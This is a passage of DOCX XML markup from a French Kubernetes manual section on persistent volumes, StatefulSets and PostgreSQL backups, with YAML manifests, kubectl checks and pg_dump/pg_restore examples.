          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>PersistentVolume</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> décrit un espace disponible ; un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>PersistentVolumeClaim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en demande une partie. La liaison se fait selon la taille, le mode d'accès et la classe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3238500"/>
            <wp:docPr id="79" name="Picture 79"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f77.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId113"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3238500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.77 — Le cycle d'un volume persistant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une demande de volume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apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: PersistentVolumeClaim</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: pgdata</w:t>
        <w:br/>
        <w:t xml:space="preserve">  namespace: production</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  accessModes: ["ReadWriteOnce"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">  storageClassName: standard</w:t>
        <w:br/>
        <w:t xml:space="preserve">  resources:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    requests:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      storage: 20Gi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.249 — Quatre modes d'accès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8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Mode d'accès</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Signification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2784"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ReadWriteOnce</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Un seul nœud en écriture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Bases de données</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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ReadOnlyMany</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Plusieurs nœuds en lecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Contenus partagés</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2784"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ReadWriteMany</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Plusieurs nœuds en écriture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2916"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Systèmes de fichiers réseau</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="278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ReadWriteOncePod</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Un seul pod</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="291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Isolation stricte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux vérifications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Vérifier la liaison</w:t>
        <w:br/>
        <w:t>kubectl get pvc -n production</w:t>
        <w:br/>
        <w:t># NAME     STATUS   VOLUME    CAPACITY   STORAGECLASS</w:t>
        <w:br/>
        <w:t># pgdata   Bound    pvc-...   20Gi       standard</w:t>
        <w:br/>
        <w:br/>
        <w:t>kubectl describe pvc pgdata -n production | tail -10</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`RECLAIMPOLICY` DÉCIDE DU SORT DES DONNÉES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Avec </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Delete</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, la suppression du PVC supprime le volume sous-jacent. Avec </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Retain</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>, le volume survit mais doit être nettoyé manuellement. Vérifiez la politique de votre classe de stockage avant toute suppression.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>68.3 StatefulSet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Deployment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> traite ses réplicas comme interchangeables. Un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>StatefulSet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> donne à chacune une identité stable : nom, réseau et volume propres.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.250 — Quatre différences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38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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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StatefulSet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2386"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Identité des pods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Aléatoire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ordonnée (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>db-0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>db-1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="238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Volumes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Partagés ou absents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Un par pod</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2386"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ordre de démarrage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Simultané</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3314"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Séquentiel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="238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Cas d'usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Sans état</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="33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Bases, files, clusters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un StatefulSet de trois réplicas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apiVersion: apps/v1</w:t>
        <w:br/>
        <w:t>kind: StatefulSet</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: db</w:t>
        <w:br/>
        <w:t xml:space="preserve">  namespace: production</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  serviceName: db</w:t>
        <w:br/>
        <w:t xml:space="preserve">  replicas: 3</w:t>
        <w:br/>
        <w:t xml:space="preserve">  selector:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    matchLabels: { app: db }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  template:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      labels: { app: db }</w:t>
        <w:br/>
        <w:t xml:space="preserve">    spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      containers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        - name: postgres</w:t>
        <w:br/>
        <w:t xml:space="preserve">          image: postgres:16</w:t>
        <w:br/>
        <w:t xml:space="preserve">          volumeMounts:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            - name: data</w:t>
        <w:br/>
        <w:t xml:space="preserve">              mountPath: /var/lib/postgresql/data</w:t>
        <w:br/>
        <w:t xml:space="preserve">  volumeClaimTemplates:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        name: data</w:t>
        <w:br/>
        <w:t xml:space="preserve">      spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        accessModes: ["ReadWriteOnce"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">        storageClassName: standard</w:t>
        <w:br/>
        <w:t xml:space="preserve">        resources:</w:t>
        <w:br/>
        <w:t xml:space="preserve">          requests:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            storage: 20Gi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Chaque pod reçoit un PVC nommé </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>data-db-0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>data-db-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>data-db-2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Supprimer le StatefulSet ne supprime pas ces PVC : c'est une protection contre la perte accidentelle, mais aussi une source de coût si l'on oublie de nettoyer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux vérifications et une mise en garde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Un StatefulSet ne suffit pas à faire une base répliquée</w:t>
        <w:br/>
        <w:t># Il faut un mécanisme de réplication et d'élection :</w:t>
        <w:br/>
        <w:t># - opérateur PostgreSQL (CloudNativePG, Zalando)</w:t>
        <w:br/>
        <w:t># - opérateur MySQL (Vitess, Percona)</w:t>
        <w:br/>
        <w:t># - Redis avec Sentinel ou Cluster</w:t>
        <w:br/>
        <w:br/>
        <w:t>kubectl get statefulset -n production</w:t>
        <w:br/>
        <w:t>kubectl get pvc -n production -l app=db</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>68.4 Sauvegarder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une réplication n'est pas une sauvegarde : une erreur logique se réplique instantanément. Une sauvegarde doit être externalisée et testée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois opérations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Sauvegarde logique d'une base PostgreSQL</w:t>
        <w:br/>
        <w:t>kubectl exec -n production db-0 -- \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  pg_dump -U app -Fc app &gt; app-$(date +%F).dump</w:t>
        <w:br/>
        <w:br/>
        <w:t># Sauvegarde vers un stockage objet</w:t>
        <w:br/>
        <w:t>kubectl exec -n production db-0 -- \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  pg_dump -U app -Fc app | gzip | \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  aws s3 cp - s3://sauvegardes/app/$(date +%F).dump.gz</w:t>
        <w:br/>
        <w:br/>
        <w:t># Restauration dans une base de test</w:t>
        <w:br/>
        <w:t>createdb -h db-test -U app restauration</w:t>
        <w:br/>
        <w:t>pg_restore -h db-test -U app -d restauration app-2026-10-19.dump</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.251 — Quatre méthodes de sauvegarde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04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Méthode</w:t>
